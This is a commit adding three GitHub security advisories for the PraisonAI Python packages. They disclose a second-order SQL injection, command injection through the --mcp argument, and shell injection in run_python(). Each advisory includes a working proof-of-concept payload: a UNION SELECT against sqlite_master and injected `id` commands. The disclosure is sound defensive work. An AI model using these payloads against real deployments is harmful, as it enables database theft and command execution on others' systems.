Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit d5a7d7dc03d1 · 2026-04-01T23:21:11.000Z
GHSA-9cq8-3v94-434g GHSA-9gm9-c8mq-vq7m GHSA-w37c-qqfp-c67f
diff --git a/advisories/github-reviewed/2026/04/GHSA-9cq8-3v94-434g/GHSA-9cq8-3v94-434g.json b/advisories/github-reviewed/2026/04/GHSA-9cq8-3v94-434g/GHSA-9cq8-3v94-434g.json
@@ -0,0 +1,60 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-9cq8-3v94-434g",
+  "modified": "2026-04-01T23:20:33Z",
+  "published": "2026-04-01T23:20:32Z",
+  "aliases": [
+    "CVE-2026-34934"
+  ],
+  "summary": "PraisonAI Has Second-Order SQL Injection in `get_all_user_threads`",
+  "details": "## Summary\n\nThe `get_all_user_threads` function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database. An attacker stores a malicious thread ID via `update_thread`. When the application loads the thread list, the injected payload executes and grants full database access.\n\n---\n\n## Details\n\n**File Path:**  \n`src/praisonai/praisonai/ui/sql_alchemy.py`\n\n**Flow:**\n- **Source (Line 539):**\n```python\nawait data_layer.update_thread(thread_id=payload, user_id=user)\n```\n\n- **Hop (Line 547):**\n```python\nthread_ids = \"('\" + \"','\".join([t[\"thread_id\"] for t in user_threads]) + \"')\"\n```\n\n- **Sink (Line 576):**\n```sql\nWHERE s.\"threadId\" IN {thread_ids}\n```\n\n---\n\n## Proof of Concept (PoC)\n\n```python\n\nimport asyncio\nfrom praisonai.ui.sql_alchemy import SQLAlchemyDataLayer\n\nasync def run_poc():\n    data_layer = SQLAlchemyDataLayer(conninfo=\"sqlite+aiosqlite:///app.db\")\n\n    # Insert a valid thread\n    await data_layer.update_thread(\n        thread_id=\"valid_thread\", \n        user_id=\"attacker\"\n    )\n\n    # Inject malicious payload\n    payload = \"x') UNION SELECT name, null, null, 'valid_thread', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM sqlite_master--\"\n\n    await data_layer.update_thread(\n        thread_id=payload, \n        user_id=\"attacker\"\n    )\n\n    # Trigger vulnerable function\n    result = await data_layer.get_all_user_threads(user_id=\"attacker\")\n\n    for thread in result:\n        if getattr(thread, 'id', '') == 'valid_thread':\n            for step in getattr(thread, 'steps', []):\n                print(getattr(step, 'id', ''))\n\nasyncio.run(run_poc())\n\n# Expected Output:\n# sqlite_master table names printed to console\n```\n\n---\n\n## Impact\n\nAn attacker can achieve full database compromise, including:\n\n- Exfiltration of sensitive data (user emails, session tokens, API keys)\n- Access to all conversation histories\n- Ability to modify or delete database contents",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "praisonai"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "4.5.90"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 4.5.89"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9cq8-3v94-434g"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/MervinPraison/PraisonAI"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-89"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-01T23:20:32Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-9gm9-c8mq-vq7m/GHSA-9gm9-c8mq-vq7m.json b/advisories/github-reviewed/2026/04/GHSA-9gm9-c8mq-vq7m/GHSA-9gm9-c8mq-vq7m.json
@@ -0,0 +1,64 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-9gm9-c8mq-vq7m",
+  "modified": "2026-04-01T23:20:00Z",
+  "published": "2026-04-01T23:20:00Z",
+  "aliases": [
+    "CVE-2026-34935"
+  ],
+  "summary": "PraisonAI: OS Command Injection in MCPHandler.parse_mcp_command()",
+  "details": "### Summary\n\nThe `--mcp` CLI argument is passed directly to `shlex.split()` and forwarded through the call chain to `anyio.open_process()` with no validation, allowlist check, or sanitization at any hop, allowing arbitrary OS command execution as the process user.\n\n### Details\n\n`cli/features/mcp.py:61` (source) -> `praisonaiagents/mcp/mcp.py:345` (hop) -> `mcp/client/stdio/__init__.py:253` (sink)\n```python\n# source\nparts = shlex.split(command)\n\n# hop\ncmd, args, env = self.parse_mcp_command(command, env_vars)\nself.server_params = StdioServerParameters(command=cmd, args=arguments)\n\n# sink\nprocess = await anyio.open_process([command, *args])\n\n```\n\nFixed in commit `47bff65413beaa3c21bf633c1fae4e684348368c` (v4.5.69) by introducing a command allowlist:\n```python\nALLOWED_COMMANDS = {\"npx\", \"uvx\", \"node\", \"python\"}\nif cmd not in ALLOWED_COMMANDS:\n    raise ValueError(f\"Disallowed command: {cmd}\")\n```\n\n### PoC\n```python\n# tested on: praisonai==4.5.48\n# install: pip install praisonai==4.5.48\n# run: praisonai --mcp \"bash -c 'id > /tmp/pwned'\"\n# verify: cat /tmp/pwned\n# expected output: uid=1000(...) gid=1000(...) groups=1000(...)\n```\n\n### Impact\n\nAny deployment where the `--mcp` argument is influenced by untrusted input is exposed to full OS command execution as the process user. No authentication is required.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "praisonai"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "4.5.15"
+            },
+            {
+              "fixed": "4.5.69"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 4.5.68"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9gm9-c8mq-vq7m"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/MervinPraison/PraisonAI/commit/47bff65413beaa3c21bf633c1fae4e684348368c"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/MervinPraison/PraisonAI"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-78"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-01T23:20:00Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-w37c-qqfp-c67f/GHSA-w37c-qqfp-c67f.json b/advisories/github-reviewed/2026/04/GHSA-w37c-qqfp-c67f/GHSA-w37c-qqfp-c67f.json
@@ -0,0 +1,60 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-w37c-qqfp-c67f",
+  "modified": "2026-04-01T23:18:17Z",
+  "published": "2026-04-01T23:18:17Z",
+  "aliases": [
+    "CVE-2026-34937"
+  ],
+  "summary": "PraisonAI: Shell Injection in run_python() via Unescaped $() Substitution",
+  "details": "### Summary\n\n`run_python()` in `praisonai` constructs a shell command string by interpolating user-controlled code into `python3 -c \"<code>\"` and passing it to `subprocess.run(..., shell=True)`. The escaping logic only handles `\\` and `\"`, leaving `$()` and backtick substitutions unescaped, allowing arbitrary OS command execution before Python is invoked.\n\n### Details\n\n`execute_command.py:290` (source) -> `execute_command.py:297` (hop) -> `execute_command.py:310` (sink)\n```python\n# source -- user-controlled code argument\ndef run_python(code: str, cwd=None, timeout=60):\n\n# hop -- incomplete escaping, $ and () not handled\n    escaped_code = code.replace('\\\\', '\\\\\\\\').replace('\"', '\\\\\"')\n    command = f'{python_cmd} -c \"{escaped_code}\"'\n\n# sink -- shell=True expands $() before python3 runs\n    return execute_command(command=command, cwd=cwd, timeout=timeout)\n    # execute_command calls subprocess.run(command, shell=True, ...)\n```\n\n### PoC\n```python\n# tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30)\n# install: pip install -e src/praisonai\nimport sys\nsys.path.insert(0, 'src/praisonai')\nfrom praisonai.code.tools.execute_command import run_python\n\nresult = run_python(code='$(id > /tmp/injected)')\nprint(result)\n\n# verify\nimport subprocess\nprint(subprocess.run(['cat', '/tmp/injected'], capture_output=True, text=True).stdout)\n# expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)...\n```\n\n### Impact\n\nAny agent pipeline or API consumer that passes user or task-supplied content to `run_python()` is exposed to full OS command execution as the process user. The function is reachable via indirect prompt injection and the auto-generated Flask server deploys with `AUTH_ENABLED = False` by default when no token is configured.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "praisonaiagents"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.5.90"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 1.5.89"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-w37c-qqfp-c67f"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/MervinPraison/PraisonAI"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-78"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-01T23:18:17Z",
+    "nvd_published_at": null
+  }
+}
